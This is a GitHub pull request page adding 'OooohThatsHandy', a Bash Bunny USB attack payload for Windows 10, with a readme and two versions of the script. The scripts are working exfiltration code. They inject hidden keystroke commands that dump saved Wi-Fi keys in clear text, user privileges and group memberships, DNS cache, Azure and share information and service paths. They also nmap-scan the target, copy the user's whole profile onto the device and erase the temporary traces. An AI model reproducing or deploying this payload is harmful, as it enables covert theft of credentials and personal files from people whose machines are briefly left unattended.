Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

OooohThatsHandy - Juicy Data Grabber #537

Closed
wants to merge 4 commits into from
Closed
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
17 changes: 17 additions & 0 deletions payloads/library/exfiltration/OooohThatsHandy/Read-Me
Original file line number Diff line number Diff line change
@@ -0,0 +1,17 @@
OooohThatsHandy
Extract useful information such as nmap scan results, wifi keys, Local DNS Cache, User privilieges and group memberships, user folder contents with images and documents being transferred
Designed for and tested on Win 10
@PeteDavis91 - Follow me on Twitter!
v0.4
Exfiltration
Attackmodes - HID Storage RNDIS_ETHERNET
Credit to Hak5 & Darren for making amaizng content and products for years!
Thanks to 0iphori3 and Cribbit for answering my annoying questions all the time on the discord!


LED CODES:
SOLID BLUE LED: Setting Up
FAST BLUE LED: Creating Data
VERY FAST BLUE LED: Exporting Data Created and Discovered
SOLID WHITE LED: Cleaning up and finalizing
FINISH GREEN LED: Safe to remove your Bash Bunny - Enjoy the data
57 changes: 57 additions & 0 deletions payloads/library/exfiltration/OooohThatsHandy/payload
Original file line number Diff line number Diff line change
@@ -0,0 +1,57 @@
REM Title: OooohThatsHandy
REM Description: Extract useful information such as nmap, wifi keys, DNS Cache, User privilieges and group memberships, user folder contents with images etc
REM OS: Designed for Win 10
REM Author: Twitter @PeteDavis91
REM Version: 0.4
REM Category: Exfiltration
REM Attackmodes: HID Storage RNDIS_ETHERNET
REM Credz: Hak5 Darren obviously, 0iphori3 and Cribbit


REM LED CODES:
REM SOLID BLUE LED: Setting Up
REM FAST BLUE LED: Creating Data
REM VERY FAST BLUE LED: Exporting Data Created and Discovered
REM SOLID WHITE LED: Cleaning up and finalizing
REM FINISH GREEN LED: Safe to remove your Bash Bunny - Enjoy the data

REM This section sets up the BashBunny
LED B SOLID
Q DELAY 1000
DUCKY_LANG gb
ATTACKMODE HID STORAGE RNDIS_ETHERNET
Q DELAY 1000
GET TARGET_IP
Q DELAY 500

REM This section runs commands to create logs and data for export
LED B FAST
Q DELAY 500
mkdir /root/hostsideloot
Q DELAY 1000
nmap -sC -O -F $TARGET_IP >> /root/hostsideloot/1.txt
Q DELAY 1000
RUN WIN 'cmd /minimized /c mkdir %TEMP%\LOOK && netsh wlan show profile * key=clear > %TEMP%\LOOK\2.txt & whoami /all > %TEMP%\LOOK\3.txt'
Q DELAY 1000
RUN WIN 'cmd /minimized /c ipconfig /displaydns > %TEMP%\LOOK\4.txt & dsregcmd /status > %TEMP%\LOOK\5.txt'
Q DELAY 750


REM This section exports the previously created data as well as the running user profile with images and documents
LED B VERYFAST
Q DELAY 50
RUN WIN "powershell -W Hidden -c \$destination = ((gwmi win32_volume -f '\"label=''BashBunny'''\").Name); robocopy \$env:TEMP\\LOOK \$destination\\loot\\"
Q DELAY 1000
RUN WIN "powershell -W Hidden -c \$destination = ((gwmi win32_volume -f '\"label=''BashBunny'''\").Name); robocopy \$env:USERPROFILE \$destination\\loot\\"
Q DELAY 1000
mv /root/hostsideloot/1.txt /root/udisk/loot/

REM Cleanup and finalizing
LED W SOLID
RUN WIN 'cmd /c rmdir /s /q %TEMP%\LOOK'
rmdir /root/hostsideloot


ATTACKMODE FINISH
LED G FINISH

63 changes: 63 additions & 0 deletions payloads/library/exfiltration/OooohThatsHandy/payload.txt.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,63 @@
REM Title: OooohThatsHandy
REM Description: Extract useful information such as nmap, wifi keys, DNS Cache, User privilieges and group memberships, user folder contents with images and documents, shared folders
REM OS: Designed for Win 10
REM Author: Twitter @PeteDavis91
REM Version: 0.6
REM Category: Exfiltration
REM Attackmodes: HID Storage RNDIS_ETHERNET
REM Credz: Hak5 Darren obviously, 0iphori3 and Cribbit


REM LED CODES:
REM SOLID BLUE LED: Setting Up
REM FAST BLUE LED: Creating Data
REM VERY FAST BLUE LED: Exporting Data Created and Discovered
REM SOLID WHITE LED: Cleaning up and finalizing
REM FINISH GREEN LED: Safe to remove your Bash Bunny - Enjoy the data

REM OPTIONS
REM This option is used for the transferring the user profile onto the BashBunny. Set in milliseconds, the longer you can wait the more data you will get.
NoTimeToHangAround=30000

REM This section sets up the BashBunny
LED B SOLID
Q DELAY 1000
DUCKY_LANG gb
ATTACKMODE HID STORAGE RNDIS_ETHERNET
Q DELAY 1000
GET TARGET_IP
Q DELAY 500

REM This section runs commands to create logs and data for export
LED B FAST
Q DELAY 500
mkdir /root/hostsideloot
Q DELAY 1000
nmap -sC -O -F $TARGET_IP >> /root/hostsideloot/nmap.txt
Q DELAY 1000
RUN WIN 'cmd /minimized /c mkdir %TEMP%\LOOK && netsh wlan show profile * key=clear > %TEMP%\LOOK\WiFi.txt & whoami /all > %TEMP%\LOOK\UserGroupsPrivs.txt'
Q DELAY 1000
RUN WIN 'cmd /minimized /c ipconfig /displaydns > %TEMP%\LOOK\DNSCache.txt & dsregcmd /status > %TEMP%\LOOK\AzureInfo.txt & net share > %TEMP%\LOOK\Shares.txt'
Q DELAY 1000
RUN WIN "powershell -W Hidden -c \$s = gwmi win32_service; echo \$s.pathname | Out-File -FilePath %TEMP%\\LOOK\\CheckForUnquoted.txt"


REM This section exports the previously created data as well as the running user profile with images and documents
LED B VERYFAST
Q DELAY 50
RUN WIN "powershell -W Hidden -c \$destination = ((gwmi win32_volume -f '\"label=''BashBunny'''\").Name); robocopy \$env:TEMP\\LOOK \$destination\\loot\\"
Q DELAY 1000
RUN WIN "powershell -W Hidden -c \$destination = ((gwmi win32_volume -f '\"label=''BashBunny'''\").Name); robocopy \$env:USERPROFILE \$destination\\loot\\ /E /W:1 /R:1 /NP /MT /XD \"\$env:APPDATA\" \"\$env:LOCALAPPDATA\" \"\$env:USERPROFILE\\AppData\""
Q DELAY $NoTimeToHangAround


REM Cleanup and finalizing
LED W SOLID
mv /root/hostsideloot/nmap.txt /root/udisk/loot/
RUN WIN 'cmd /c rmdir /s /q %TEMP%\LOOK'
rmdir /root/hostsideloot


ATTACKMODE FINISH
LED G FINISH